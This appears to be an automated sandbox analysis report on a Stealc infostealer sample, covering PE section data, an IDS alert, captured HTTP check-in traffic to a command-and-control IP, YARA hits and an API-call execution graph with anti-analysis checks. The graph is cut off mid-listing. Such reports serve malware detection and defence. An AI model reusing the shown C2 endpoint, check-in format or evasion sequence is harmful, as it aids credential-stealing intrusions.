                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      0x10000x25b0000x22800d14b2abdbd6203f2e6be5941cbdeb89eunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      0x25e0000x2a20000x20073ef0bbdbe85d60f62bd98f77be3600dunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      vpiveclu0x5000000x19d0000x19d000136ba286d3ed0550c701089edd175b03False0.9948866430841404data7.954457957368027IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      abjcrpar0x69d0000x10000x4001e9dfa31a6599407b9e827ad9dfc30caFalse0.697265625data5.680595868484483IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .taggant0x69e0000x30000x220077b3be650c20a3216c65621ec2130d2fFalse0.09708180147058823DOS executable (COM)1.1952884008350921IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                      Imports

                                      DLLImport
                                      kernel32.dlllstrcpy

                                      Network Behavior

                                      Suricata IDS Alerts

                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                      2024-09-27T17:41:16.620266+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.749705185.215.113.3780TCP

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Sep 27, 2024 17:41:15.671010017 CEST4970580192.168.2.7185.215.113.37
                                      Sep 27, 2024 17:41:15.675862074 CEST8049705185.215.113.37192.168.2.7
                                      Sep 27, 2024 17:41:15.675949097 CEST4970580192.168.2.7185.215.113.37
                                      Sep 27, 2024 17:41:15.676738977 CEST4970580192.168.2.7185.215.113.37
                                      Sep 27, 2024 17:41:15.681847095 CEST8049705185.215.113.37192.168.2.7
                                      Sep 27, 2024 17:41:16.380487919 CEST8049705185.215.113.37192.168.2.7
                                      Sep 27, 2024 17:41:16.380553961 CEST4970580192.168.2.7185.215.113.37
                                      Sep 27, 2024 17:41:16.385123014 CEST4970580192.168.2.7185.215.113.37
                                      Sep 27, 2024 17:41:16.390222073 CEST8049705185.215.113.37192.168.2.7
                                      Sep 27, 2024 17:41:16.620198011 CEST8049705185.215.113.37192.168.2.7
                                      Sep 27, 2024 17:41:16.620265961 CEST4970580192.168.2.7185.215.113.37
                                      Sep 27, 2024 17:41:20.289582968 CEST4970580192.168.2.7185.215.113.37

                                      HTTP Request Dependency Graph

                                      • 185.215.113.37

                                      HTTP Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.749705185.215.113.37806952C:\Users\user\Desktop\file.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 27, 2024 17:41:15.676738977 CEST89OUTGET / HTTP/1.1
                                      Host: 185.215.113.37
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache
                                      Sep 27, 2024 17:41:16.380487919 CEST203INHTTP/1.1 200 OK
                                      Date: Fri, 27 Sep 2024 15:41:16 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Content-Length: 0
                                      Keep-Alive: timeout=5, max=100
                                      Connection: Keep-Alive
                                      Content-Type: text/html; charset=UTF-8
                                      Sep 27, 2024 17:41:16.385123014 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=----BFCFBKKKFHCFHJKFIIEH
                                      Host: 185.215.113.37
                                      Content-Length: 211
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache
                                      Data Raw: 2d 2d 2d 2d 2d 2d 42 46 43 46 42 4b 4b 4b 46 48 43 46 48 4a 4b 46 49 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 42 30 44 33 35 30 41 33 30 31 44 33 36 36 33 38 31 32 31 38 31 0d 0a 2d 2d 2d 2d 2d 2d 42 46 43 46 42 4b 4b 4b 46 48 43 46 48 4a 4b 46 49 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 42 46 43 46 42 4b 4b 4b 46 48 43 46 48 4a 4b 46 49 49 45 48 2d 2d 0d 0a
                                      Data Ascii: ------BFCFBKKKFHCFHJKFIIEHContent-Disposition: form-data; name="hwid"4B0D350A301D3663812181------BFCFBKKKFHCFHJKFIIEHContent-Disposition: form-data; name="build"save------BFCFBKKKFHCFHJKFIIEH--
                                      Sep 27, 2024 17:41:16.620198011 CEST210INHTTP/1.1 200 OK
                                      Date: Fri, 27 Sep 2024 15:41:16 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Content-Length: 8
                                      Keep-Alive: timeout=5, max=99
                                      Connection: Keep-Alive
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 59 6d 78 76 59 32 73 3d
                                      Data Ascii: YmxvY2s=


                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      System Behavior

                                      General

                                      Target ID:0
                                      Start time:11:41:11
                                      Start date:27/09/2024
                                      Path:C:\Users\user\Desktop\file.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\file.exe"
                                      Imagebase:0xca0000
                                      File size:1'847'808 bytes
                                      MD5 hash:FE0680DFA4A95F3C9F5EFE7B68BEBDC8
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1367337890.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1326837199.0000000004DF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      Disassembly

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:9.3%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:10.1%
                                        Total number of Nodes:2000
                                        Total number of Limit Nodes:24
                                        execution_graph 13550 cb69f0 13595 ca2260 13550->13595 13574 cb6a64 13575 cba9b0 4 API calls 13574->13575 13576 cb6a6b 13575->13576 13577 cba9b0 4 API calls 13576->13577 13578 cb6a72 13577->13578 13579 cba9b0 4 API calls 13578->13579 13580 cb6a79 13579->13580 13581 cba9b0 4 API calls 13580->13581 13582 cb6a80 13581->13582 13747 cba8a0 13582->13747 13584 cb6b0c 13751 cb6920 GetSystemTime 13584->13751 13586 cb6a89 13586->13584 13588 cb6ac2 OpenEventA 13586->13588 13589 cb6ad9 13588->13589 13590 cb6af5 CloseHandle Sleep 13588->13590 13594 cb6ae1 CreateEventA 13589->13594 13592 cb6b0a 13590->13592 13592->13586 13594->13584 13948 ca45c0 13595->13948 13597 ca2274 13598 ca45c0 2 API calls 13597->13598 13599 ca228d 13598->13599 13600 ca45c0 2 API calls 13599->13600 13601 ca22a6 13600->13601 13602 ca45c0 2 API calls 13601->13602 13603 ca22bf 13602->13603 13604 ca45c0 2 API calls 13603->13604 13605 ca22d8 13604->13605 13606 ca45c0 2 API calls 13605->13606 13607 ca22f1 13606->13607 13608 ca45c0 2 API calls 13607->13608 13609 ca230a 13608->13609 13610 ca45c0 2 API calls 13609->13610 13611 ca2323 13610->13611 13612 ca45c0 2 API calls 13611->13612 13613 ca233c 13612->13613 13614 ca45c0 2 API calls 13613->13614 13615 ca2355 13614->13615 13616 ca45c0 2 API calls 13615->13616 13617 ca236e 13616->13617 13618 ca45c0 2 API calls 13617->13618 13619 ca2387 13618->13619 13620 ca45c0 2 API calls 13619->13620 13621 ca23a0 13620->13621 13622 ca45c0 2 API calls 13621->13622 13623 ca23b9 13622->13623 13624 ca45c0 2 API calls 13623->13624 13625 ca23d2 13624->13625 13626 ca45c0 2 API calls 13625->13626 13627 ca23eb 13626->13627 13628 ca45c0 2 API calls 13627->13628 13629 ca2404 13628->13629 13630 ca45c0 2 API calls 13629->13630 13631 ca241d 13630->13631 13632 ca45c0 2 API calls 13631->13632 13633 ca2436 13632->13633 13634 ca45c0 2 API calls 13633->13634 13635 ca244f 13634->13635 13636 ca45c0 2 API calls 13635->13636 13637 ca2468 13636->13637 13638 ca45c0 2 API calls 13637->13638 13639 ca2481 13638->13639 13640 ca45c0 2 API calls 13639->13640 13641 ca249a 13640->13641 13642 ca45c0 2 API calls 13641->13642 13643 ca24b3 13642->13643 13644 ca45c0 2 API calls 13643->13644 13645 ca24cc 13644->13645 13646 ca45c0 2 API calls 13645->13646 13647 ca24e5 13646->13647 13648 ca45c0 2 API calls 13647->13648 13649 ca24fe 13648->13649 13650 ca45c0 2 API calls 13649->13650 13651 ca2517 13650->13651 13652 ca45c0 2 API calls 13651->13652 13653 ca2530 13652->13653 13654 ca45c0 2 API calls 13653->13654 13655 ca2549 13654->13655 13656 ca45c0 2 API calls 13655->13656 13657 ca2562 13656->13657 13658 ca45c0 2 API calls 13657->13658 13659 ca257b 13658->13659 13660 ca45c0 2 API calls 13659->13660 13661 ca2594 13660->13661 13662 ca45c0 2 API calls 13661->13662 13663 ca25ad 13662->13663 13664 ca45c0 2 API calls 13663->13664 13665 ca25c6 13664->13665 13666 ca45c0 2 API calls 13665->13666 13667 ca25df 13666->13667 13668 ca45c0 2 API calls 13667->13668 13669 ca25f8 13668->13669 13670 ca45c0 2 API calls 13669->13670 13671 ca2611 13670->13671 13672 ca45c0 2 API calls 13671->13672 13673 ca262a 13672->13673 13674 ca45c0 2 API calls 13673->13674 13675 ca2643 13674->13675 13676 ca45c0 2 API calls 13675->13676 13677 ca265c 13676->13677 13678 ca45c0 2 API calls 13677->13678 13679 ca2675 13678->13679 13680 ca45c0 2 API calls 13679->13680 13681 ca268e 13680->13681 13682 cb9860 13681->13682 13953 cb9750 GetPEB 13682->13953 13684 cb9868 13685 cb987a 13684->13685 13686 cb9a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 13684->13686 13689 cb988c 21 API calls 13685->13689 13687 cb9b0d 13686->13687 13688 cb9af4 GetProcAddress 13686->13688 13690 cb9b46 13687->13690 13691 cb9b16 GetProcAddress GetProcAddress 13687->13691 13688->13687 13689->13686 13692 cb9b68 13690->13692 13693 cb9b4f GetProcAddress 13690->13693 13691->13690 13694 cb9b89 13692->13694 13695 cb9b71 GetProcAddress 13692->13695 13693->13692 13696 cb9b92 GetProcAddress GetProcAddress 13694->13696 13697 cb6a00 13694->13697 13695->13694 13696->13697 13698 cba740 13697->13698 13699 cba750 13698->13699 13700 cb6a0d 13699->13700 13701 cba77e lstrcpy 13699->13701 13702 ca11d0 13700->13702 13701->13700 13703 ca11e8 13702->13703 13704 ca120f ExitProcess 13703->13704 13705 ca1217 13703->13705 13706 ca1160 GetSystemInfo 13705->13706 13707 ca117c ExitProcess 13706->13707 13708 ca1184 13706->13708 13709 ca1110 GetCurrentProcess VirtualAllocExNuma 13708->13709 13710 ca1149 13709->13710 13711 ca1141 ExitProcess 13709->13711 13954 ca10a0 VirtualAlloc 13710->13954 13714 ca1220 13958 cb89b0 13714->13958 13717 ca129a 13720 cb6770 GetUserDefaultLangID 13717->13720 13718 ca1249 __aulldiv 13718->13717 13719 ca1292 ExitProcess 13718->13719 13721 cb67d3 13720->13721 13722 cb6792 13720->13722 13728 ca1190 13721->13728 13722->13721 13723 cb67cb ExitProcess 13722->13723 13724 cb67ad ExitProcess 13722->13724 13725 cb67a3 ExitProcess 13722->13725 13726 cb67c1 ExitProcess 13722->13726 13727 cb67b7 ExitProcess 13722->13727 13723->13721 13729 cb78e0 3 API calls 13728->13729 13730 ca119e 13729->13730 13731 ca11cc 13730->13731 13732 cb7850 3 API calls 13730->13732 13735 cb7850 GetProcessHeap RtlAllocateHeap GetUserNameA 13731->13735 13733 ca11b7 13732->13733 13733->13731 13734 ca11c4 ExitProcess 13733->13734 13736 cb6a30 13735->13736 13737 cb78e0 GetProcessHeap RtlAllocateHeap GetComputerNameA 13736->13737 13738 cb6a43 13737->13738 13739 cba9b0 13738->13739 13960 cba710 13739->13960 13741 cba9c1 lstrlen 13742 cba9e0 13741->13742 13743 cbaa18 13742->13743 13745 cba9fa lstrcpy lstrcat 13742->13745 13961 cba7a0 13743->13961 13745->13743 13746 cbaa24 13746->13574 13748 cba8bb 13747->13748 13749 cba90b 13748->13749 13750 cba8f9 lstrcpy 13748->13750 13749->13586 13750->13749 13965 cb6820 13751->13965 13753 cb698e 13754 cb6998 sscanf 13753->13754 13994 cba800 13754->13994 13756 cb69aa SystemTimeToFileTime SystemTimeToFileTime 13757 cb69ce 13756->13757 13758 cb69e0 13756->13758 13757->13758 13759 cb69d8 ExitProcess 13757->13759 13760 cb5b10 13758->13760 13761 cb5b1d 13760->13761 13762 cba740 lstrcpy 13761->13762 13763 cb5b2e 13762->13763 13996 cba820 lstrlen 13763->13996 13766 cba820 2 API calls 13767 cb5b64 13766->13767 13768 cba820 2 API calls 13767->13768 13769 cb5b74 13768->13769 14000 cb6430 13769->14000 13772 cba820 2 API calls 13773 cb5b93 13772->13773 13774 cba820 2 API calls 13773->13774 13775 cb5ba0 13774->13775 13776 cba820 2 API calls 13775->13776 13777 cb5bad 13776->13777 13778 cba820 2 API calls 13777->13778 13779 cb5bf9 13778->13779 14009 ca26a0 13779->14009 13787 cb5cc3 13788 cb6430 lstrcpy 13787->13788 13789 cb5cd5 13788->13789 13790 cba7a0 lstrcpy 13789->13790 13791 cb5cf2 13790->13791 13792 cba9b0 4 API calls 13791->13792 13793 cb5d0a 13792->13793 13794 cba8a0 lstrcpy 13793->13794 13795 cb5d16 13794->13795 13796 cba9b0 4 API calls 13795->13796 13797 cb5d3a 13796->13797 13798 cba8a0 lstrcpy 13797->13798 13799 cb5d46 13798->13799 13800 cba9b0 4 API calls 13799->13800 13801 cb5d6a 13800->13801 13802 cba8a0 lstrcpy 13801->13802 13803 cb5d76 13802->13803 13804 cba740 lstrcpy 13803->13804 13805 cb5d9e 13804->13805 14735 cb7500 GetWindowsDirectoryA 13805->14735 13808 cba7a0 lstrcpy 13809 cb5db8 13808->13809 14745 ca4880 13809->14745 13811 cb5dbe 14890 cb17a0 13811->14890 13813 cb5dc6 13814 cba740 lstrcpy 13813->13814 13815 cb5de9 13814->13815 13816 ca1590 lstrcpy 13815->13816 13817 cb5dfd 13816->13817 14906 ca5960 13817->14906 13819 cb5e03 15050 cb1050 13819->15050 13821 cb5e0e 13822 cba740 lstrcpy 13821->13822 13823 cb5e32 13822->13823 13824 ca1590 lstrcpy 13823->13824 13825 cb5e46 13824->13825 13826 ca5960 34 API calls 13825->13826 13827 cb5e4c 13826->13827 15054 cb0d90 13827->15054 13829 cb5e57 13830 cba740 lstrcpy 13829->13830 13831 cb5e79 13830->13831 13832 ca1590 lstrcpy 13831->13832 13833 cb5e8d 13832->13833 13834 ca5960 34 API calls 13833->13834 13835 cb5e93 13834->13835 15061 cb0f40 13835->15061 13837 cb5e9e 13838 ca1590 lstrcpy 13837->13838 13839 cb5eb5 13838->13839 15066 cb1a10 13839->15066 13841 cb5eba 13842 cba740 lstrcpy 13841->13842 13843 cb5ed6 13842->13843 15410 ca4fb0 GetProcessHeap RtlAllocateHeap InternetOpenA 13843->15410 13845 cb5edb 13846 ca1590 lstrcpy 13845->13846 13847 cb5f5b 13846->13847 15417 cb0740 13847->15417 13849 cb5f60 13850 cba740 lstrcpy 13849->13850 13851 cb5f86 13850->13851 13852 ca1590 lstrcpy 13851->13852 13853 cb5f9a 13852->13853 13854 ca5960 34 API calls 13853->13854 13949 ca45d1 RtlAllocateHeap 13948->13949 13952 ca4621 VirtualProtect 13949->13952 13952->13597 13953->13684 13956 ca10c2 ctype 13954->13956 13955 ca10fd 13955->13714 13956->13955 13957 ca10e2 VirtualFree 13956->13957 13957->13955 13959 ca1233 GlobalMemoryStatusEx 13958->13959 13959->13718 13960->13741 13962 cba7c2 13961->13962 13963 cba7ec 13962->13963 13964 cba7da lstrcpy 13962->13964 13963->13746 13964->13963 13966 cba740 lstrcpy 13965->13966 13967 cb6833 13966->13967 13968 cba9b0 4 API calls 13967->13968 13969 cb6845 13968->13969 13970 cba8a0 lstrcpy 13969->13970 13971 cb684e 13970->13971 13972 cba9b0 4 API calls 13971->13972 13973 cb6867 13972->13973 13974 cba8a0 lstrcpy 13973->13974 13975 cb6870 13974->13975 13976 cba9b0 4 API calls 13975->13976 13977 cb688a 13976->13977 13978 cba8a0 lstrcpy 13977->13978 13979 cb6893 13978->13979 13980 cba9b0 4 API calls 13979->13980 13981 cb68ac 13980->13981 13982 cba8a0 lstrcpy 13981->13982 13983 cb68b5 13982->13983 13984 cba9b0 4 API calls 13983->13984 13985 cb68cf 13984->13985 13986 cba8a0 lstrcpy 13985->13986 13987 cb68d8 13986->13987 13988 cba9b0 4 API calls 13987->13988 13989 cb68f3 13988->13989 13990 cba8a0 lstrcpy 13989->13990 13991 cb68fc 13990->13991 13992 cba7a0 lstrcpy 13991->13992 13993 cb6910 13992->13993 13993->13753 13995 cba812 13994->13995 13995->13756 13997 cba83f 13996->13997 13998 cb5b54 13997->13998 13999 cba87b lstrcpy 13997->13999 13998->13766 13999->13998 14001 cba8a0 lstrcpy 14000->14001 14002 cb6443 14001->14002 14003 cba8a0 lstrcpy 14002->14003 14004 cb6455 14003->14004 14005 cba8a0 lstrcpy 14004->14005 14006 cb6467 14005->14006 14007 cba8a0 lstrcpy 14006->14007 14008 cb5b86 14007->14008 14008->13772 14010 ca45c0 2 API calls 14009->14010 14011 ca26b4 14010->14011 14012 ca45c0 2 API calls 14011->14012 14013 ca26d7 14012->14013 14014 ca45c0 2 API calls 14013->14014 14015 ca26f0 14014->14015 14016 ca45c0 2 API calls 14015->14016 14017 ca2709 14016->14017 14018 ca45c0 2 API calls 14017->14018 14019 ca2736 14018->14019 14020 ca45c0 2 API calls 14019->14020 14021 ca274f 14020->14021 14022 ca45c0 2 API calls 14021->14022 14023 ca2768 14022->14023 14024 ca45c0 2 API calls 14023->14024 14025 ca2795 14024->14025 14026 ca45c0 2 API calls 14025->14026 14027 ca27ae 14026->14027 14028 ca45c0 2 API calls 14027->14028 14029 ca27c7 14028->14029 14030 ca45c0 2 API calls 14029->14030 14031 ca27e0 14030->14031 14032 ca45c0 2 API calls 14031->14032 14033 ca27f9 14032->14033 14034 ca45c0 2 API calls 14033->14034 14035 ca2812 14034->14035 14036 ca45c0 2 API calls 14035->14036 14037 ca282b 14036->14037 14038 ca45c0 2 API calls 14037->14038 14039 ca2844 14038->14039 14040 ca45c0 2 API calls 14039->14040 14041 ca285d 14040->14041 14042 ca45c0 2 API calls 14041->14042 14043 ca2876 14042->14043 14044 ca45c0 2 API calls 14043->14044 14045 ca288f 14044->14045 14046 ca45c0 2 API calls 14045->14046 14047 ca28a8 14046->14047 14048 ca45c0 2 API calls 14047->14048 14049 ca28c1 14048->14049 14050 ca45c0 2 API calls 14049->14050 14051 ca28da 14050->14051 14052 ca45c0 2 API calls 14051->14052 14053 ca28f3 14052->14053 14054 ca45c0 2 API calls 14053->14054 14055 ca290c 14054->14055 14056 ca45c0 2 API calls 14055->14056 14057 ca2925 14056->14057 14058 ca45c0 2 API calls 14057->14058 14059 ca293e 14058->14059 14060 ca45c0 2 API calls 14059->14060 14061 ca2957 14060->14061 14062 ca45c0 2 API calls 14061->14062 14063 ca2970 14062->14063 14064 ca45c0 2 API calls 14063->14064 14065 ca2989 14064->14065 14066 ca45c0 2 API calls 14065->14066 14067 ca29a2 14066->14067 14068 ca45c0 2 API calls 14067->14068 14069 ca29bb 14068->14069 14070 ca45c0 2 API calls 14069->14070 14071 ca29d4 14070->14071 14072 ca45c0 2 API calls 14071->14072 14073 ca29ed 14072->14073 14074 ca45c0 2 API calls 14073->14074 14075 ca2a06 14074->14075 14076 ca45c0 2 API calls 14075->14076 14077 ca2a1f 14076->14077 14078 ca45c0 2 API calls 14077->14078 14079 ca2a38 14078->14079 14080 ca45c0 2 API calls 14079->14080 14081 ca2a51 14080->14081 14082 ca45c0 2 API calls 14081->14082 14083 ca2a6a 14082->14083 14084 ca45c0 2 API calls 14083->14084 14085 ca2a83 14084->14085 14086 ca45c0 2 API calls 14085->14086 14087 ca2a9c 14086->14087 14088 ca45c0 2 API calls 14087->14088 14089 ca2ab5 14088->14089 14090 ca45c0 2 API calls 14089->14090 14091 ca2ace 14090->14091 14092 ca45c0 2 API calls 14091->14092 14093 ca2ae7 14092->14093 14094 ca45c0 2 API calls 14093->14094 14095 ca2b00 14094->14095 14096 ca45c0 2 API calls 14095->14096 14097 ca2b19 14096->14097 14098 ca45c0 2 API calls 14097->14098 14099 ca2b32 14098->14099 14100 ca45c0 2 API calls 14099->14100 14101 ca2b4b 14100->14101 14102 ca45c0 2 API calls 14101->14102 14103 ca2b64 14102->14103 14104 ca45c0 2 API calls 14103->14104 14105 ca2b7d 14104->14105 14106 ca45c0 2 API calls 14105->14106 14107 ca2b96 14106->14107 14108 ca45c0 2 API calls 14107->14108 14109 ca2baf 14108->14109 14110 ca45c0 2 API calls 14109->14110 14111 ca2bc8 14110->14111 14112 ca45c0 2 API calls 14111->14112 14113 ca2be1 14112->14113 14114 ca45c0 2 API calls 14113->14114 14115 ca2bfa 14114->14115 14116 ca45c0 2 API calls 14115->14116 14117 ca2c13 14116->14117 14118 ca45c0 2 API calls 14117->14118 14119 ca2c2c 14118->14119 14120 ca45c0 2 API calls 14119->14120 14121 ca2c45 14120->14121 14122 ca45c0 2 API calls 14121->14122 14123 ca2c5e 14122->14123 14124 ca45c0 2 API calls 14123->14124 14125 ca2c77 14124->14125 14126 ca45c0 2 API calls 14125->14126 14127 ca2c90 14126->14127 14128 ca45c0 2 API calls 14127->14128 14129 ca2ca9 14128->14129 14130 ca45c0 2 API calls 14129->14130 14131 ca2cc2 14130->14131 14132 ca45c0 2 API calls 14131->14132 14133 ca2cdb 14132->14133 14134 ca45c0 2 API calls 14133->14134 14135 ca2cf4 14134->14135 14136 ca45c0 2 API calls 14135->14136 14137 ca2d0d 14136->14137 14138 ca45c0 2 API calls 14137->14138 14139 ca2d26 14138->14139 14140 ca45c0 2 API calls 14139->14140 14141 ca2d3f 14140->14141 14142 ca45c0 2 API calls 14141->14142 14143 ca2d58 14142->14143 14144 ca45c0 2 API calls 14143->14144 14145 ca2d71 14144->14145 14146 ca45c0 2 API calls 14145->14146 14147 ca2d8a 14146->14147 14148 ca45c0 2 API calls 14147->14148 14149 ca2da3 14148->14149 14150 ca45c0 2 API calls 14149->14150 14151 ca2dbc 14150->14151 14152 ca45c0 2 API calls 14151->14152 14153 ca2dd5 14152->14153 14154 ca45c0 2 API calls 14153->14154 14155 ca2dee 14154->14155 14156 ca45c0 2 API calls 14155->14156 14157 ca2e07 14156->14157 14158 ca45c0 2 API calls 14157->14158 14159 ca2e20 14158->14159 14160 ca45c0 2 API calls 14159->14160 14161 ca2e39 14160->14161 14162 ca45c0 2 API calls 14161->14162 14163 ca2e52 14162->14163 14164 ca45c0 2 API calls 14163->14164 14165 ca2e6b 14164->14165 14166 ca45c0 2 API calls 14165->14166 14167 ca2e84 14166->14167 14168 ca45c0 2 API calls 14167->14168 14169 ca2e9d 14168->14169 14170 ca45c0 2 API calls 14169->14170 14171 ca2eb6 14170->14171 14172 ca45c0 2 API calls 14171->14172 14173 ca2ecf 14172->14173 14174 ca45c0 2 API calls 14173->14174 14175 ca2ee8 14174->14175 14176 ca45c0 2 API calls 14175->14176 14177 ca2f01 14176->14177 14178 ca45c0 2 API calls 14177->14178 14179 ca2f1a 14178->14179 14180 ca45c0 2 API calls 14179->14180 14181 ca2f33 14180->14181 14182 ca45c0 2 API calls 14181->14182 14183 ca2f4c 14182->14183 14184 ca45c0 2 API calls 14183->14184 14185 ca2f65 14184->14185 14186 ca45c0 2 API calls 14185->14186 14187 ca2f7e 14186->14187 14188 ca45c0 2 API calls 14187->14188 14189 ca2f97 14188->14189 14190 ca45c0 2 API calls 14189->14190 14191 ca2fb0 14190->14191 14192 ca45c0 2 API calls 14191->14192 14193 ca2fc9 14192->14193 14194 ca45c0 2 API calls 14193->14194 14195 ca2fe2 14194->14195 14196 ca45c0 2 API calls 14195->14196 14197 ca2ffb 14196->14197 14198 ca45c0 2 API calls 14197->14198 14199 ca3014 14198->14199 14200 ca45c0 2 API calls 14199->14200 14201 ca302d 14200->14201 14202 ca45c0 2 API calls 14201->14202 14203 ca3046 14202->14203 14204 ca45c0 2 API calls 14203->14204 14205 ca305f 14204->14205 14206 ca45c0 2 API calls 14205->14206 14207 ca3078 14206->14207 14208 ca45c0 2 API calls 14207->14208 14209 ca3091 14208->14209 14210 ca45c0 2 API calls 14209->14210 14211 ca30aa 14210->14211 14212 ca45c0 2 API calls 14211->14212 14213 ca30c3 14212->14213 14214 ca45c0 2 API calls 14213->14214 14215 ca30dc 14214->14215 14216 ca45c0 2 API calls 14215->14216 14217 ca30f5 14216->14217 14218 ca45c0 2 API calls 14217->14218 14219 ca310e 14218->14219 14220 ca45c0 2 API calls 14219->14220 14221 ca3127 14220->14221 14222 ca45c0 2 API calls 14221->14222 14223 ca3140 14222->14223 14224 ca45c0 2 API calls 14223->14224 14225 ca3159 14224->14225 14226 ca45c0 2 API calls 14225->14226 14227 ca3172 14226->14227 14228 ca45c0 2 API calls 14227->14228 14229 ca318b 14228->14229 14230 ca45c0 2 API calls 14229->14230 14231 ca31a4 14230->14231 14232 ca45c0 2 API calls 14231->14232 14233 ca31bd 14232->14233 14234 ca45c0 2 API calls 14233->14234 14235 ca31d6 14234->14235 14236 ca45c0 2 API calls 14235->14236 14237 ca31ef 14236->14237 14238 ca45c0 2 API calls 14237->14238 14239 ca3208 14238->14239 14240 ca45c0 2 API calls 14239->14240 14241 ca3221 14240->14241 14242 ca45c0 2 API calls 14241->14242 14243 ca323a 14242->14243 14244 ca45c0 2 API calls 14243->14244 14245 ca3253 14244->14245 14246 ca45c0 2 API calls 14245->14246 14247 ca326c 14246->14247 14248 ca45c0 2 API calls 14247->14248 14249 ca3285 14248->14249 14250 ca45c0 2 API calls 14249->14250 14251 ca329e 14250->14251 14252 ca45c0 2 API calls 14251->14252 14253 ca32b7 14252->14253 14254 ca45c0 2 API calls 14253->14254 14255 ca32d0 14254->14255 14256 ca45c0 2 API calls 14255->14256 14257 ca32e9 14256->14257 14258 ca45c0 2 API calls 14257->14258 14259 ca3302 14258->14259 14260 ca45c0 2 API calls 14259->14260 14261 ca331b 14260->14261 14262 ca45c0 2 API calls 14261->14262 14263 ca3334 14262->14263 14264 ca45c0 2 API calls 14263->14264 14265 ca334d 14264->14265 14266 ca45c0 2 API calls 14265->14266 14267 ca3366 14266->14267 14268 ca45c0 2 API calls 14267->14268 14269 ca337f 14268->14269 14270 ca45c0 2 API calls 14269->14270 14271 ca3398 14270->14271 14272 ca45c0 2 API calls 14271->14272 14273 ca33b1 14272->14273 14274 ca45c0 2 API calls 14273->14274 14275 ca33ca 14274->14275 14276 ca45c0 2 API calls 14275->14276 14277 ca33e3 14276->14277 14278 